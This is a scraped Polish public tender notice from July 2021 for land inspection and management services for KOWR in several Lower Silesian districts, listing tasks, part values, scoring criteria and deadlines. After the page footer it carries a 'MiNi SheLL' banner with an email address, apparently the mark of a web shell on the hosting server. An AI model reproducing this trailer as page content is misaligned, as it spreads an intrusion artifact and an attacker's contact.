ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: jaworskiego, wałbrzyskiego, świdnickiego, dzierżoniowskiego, ząbkowickiego, kłodzkiego.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się w Świdnicy przy ul. Kliczkowskiej 28 przez osobę wskazaną w ofercie Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70133,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2022-10-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: zgorzeleckiego, lubańskiego, bolesławieckiego oraz terenu gminy Mirsk, Gryfów Śląski.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się w Rakowicach Wielkich 15, 59-600 Lwówek Śląski przez osobę wskazaną w ofercie. Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70133,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi lustracji nieruchomości, monitorowania oraz obsługi nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa oraz lustracja nieruchomości związana z realizacją prawa pierwokupu z terenu powiatów: złotoryjskiego, kamiennogórskiego, karkonoskiego, miasta Jelenia Góra, oraz terenu gminy Lwówek Śląski i Lubomierz, Wleń.<br/>W ramach realizacji przedmiotu zamówienia przewiduje się:<br/>a)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do sprzedaży,<br/>b)	przeprowadzanie lustracji gruntów, przewidzianych przez Zamawiającego do oddania w dzierżawę, <br/>c)	przeprowadzanie lustracji w związku z przedłużeniem umów dzierżaw, w zakresie wywiązywania się dzierżawców z obowiązków umownych ,<br/>d)	przeprowadzanie lustracji gruntów, wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na podstawie ustawy o kształtowaniu ustroju rolnego ,<br/>e)	przeprowadzanie lustracji nieruchomości w procesie ich nieodpłatnego przekazania,<br/>f)	przeprowadzania lustracji nieruchomości zgłoszonych do płatności bezpośrednich,<br/>g)	przeprowadzanie lustracji nieruchomości do spraw ich przekazania w trwały zarząd, <br/>h)	okazywanie nieruchomości przeznaczonych do sprzedaży lub dzierżawy,<br/>i)	sporządzanie protokołu z przeprowadzonych czynności w terenie zawierającego dokumentację fotograficzną, <br/>j)	dokonywanie odbiorów i wydawania nieruchomości na podstawie protokołów zdawczo- odbiorczych, <br/>k)	sporządzanie protokołów zdawczo-odbiorczych, <br/>l)	ustalanie danych osobowych bezumownych użytkowników nieruchomości, stanowiących Zasób Własności Rolnej Skarbu Państwa, <br/>m)	doręczanie wykazów i ogłoszeń dotyczących rozdysponowania nieruchomości do odpowiednich Urzędów Gmin, Sołectw i innych właściwych jednostek,<br/>n)	prawidłowej eksploatacji i odpowiedzialności finansowej za mienie udostępnione przez KOWR Wykonawcy dla celów należytego wykonania przedmiotu Umowy. <br/><br/>Powyższe usługi (w tym prace terenowe) będą wykonywane w czasie 150 godzin miesięcznie.. Zamawiający wymaga realizacji usług w biurze, mieszczącym się w Rakowicach Wielkich 15, 59-600 Lwówek Śląski przez osobę wskazaną w ofercie. Zamawiający dopuszcza możliwość świadczenia usług przez maksymalnie jedną osobę. <br/>Wykonawca będzie realizował usługi osobiście lub delegując do prac swojego pracownika lub pracownika podwykonawcy lub osobę, z którą wykonawcę łączy inny stosunek cywilno-prawny.<br/>Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w tym:<br/>a)	wyposażone stanowisko pracy biurowej z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>b) wysyłanie i odbiór korespondencji związanej ze świadczoną usługą,<br/>c)	kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>Zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług własnych środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie około 3000 km. <br/>przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>Zamawiający wymaga od Wykonawcy posiadania umiejętności czytania map geodezyjnych wraz z odniesieniem ich treści w terenie oraz posługiwania się odbiornikiem GPS.<br/>Pozostałe warunki realizacji zamówienia opisane zostały w Specyfikacji Warunków Zamówienia oraz projekcie umowy stanowiącym załącznik do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70133,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70100000-2 - Usługi w zakresie obsługi nieruchomości własnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %, <br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %, <br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisano w projektowanych postanowienia umownych stanowiących załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-19 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W kryterium „CENA” wykonawca może uzyskać maksymalnie 60 pkt. Najwyższą ilość punktów uzyska oferta zawierająca najniższą cenę, pozostałe oferty proporcjonalnie mniej. Zamawiający przyjmie do obliczeń cenę oferty podaną w Formularzu oferty. Liczba punktów dla poszczególnych ofert zostanie wyliczona według następującego wzoru:<br/>C (uzyskana ilość punktów w kryterium „CENA”) = Cn (najniższa cena spośród ofert podlegających ocenie/ Cb (cena badanej oferty) x 60 pkt<br/>4.	W kryterium „KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO BEZPOŚREDNIEJ REALIZACJI ZAMÓWIENIA” Wykonawca może uzyskać maksymalnie 40 pkt:<br/>Ocena nastąpi na podstawie wykazanego przez wykonawcę doświadczenia osób wyznaczonych do realizacji zamówienia, mającego znaczący wpływ na jakość wykonania zamówienia – ilość wykonanych w ciągu trzech lat przed upływem składania ofert, a jeżeli okres ten jest krótszy to w tym okresie, następujących czynności: <br/>a)	Lustracji nieruchomości - waga 40 % - <br/>Wykonawca może uzyskać 4 pkt za każdą wykonaną lustrację nieruchomości przez osobę wyznaczoną do realizacji zamówienia. Wykonawca otrzyma maksymalnie 40 punktów za wykonie 20 lustracji i powyżej.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com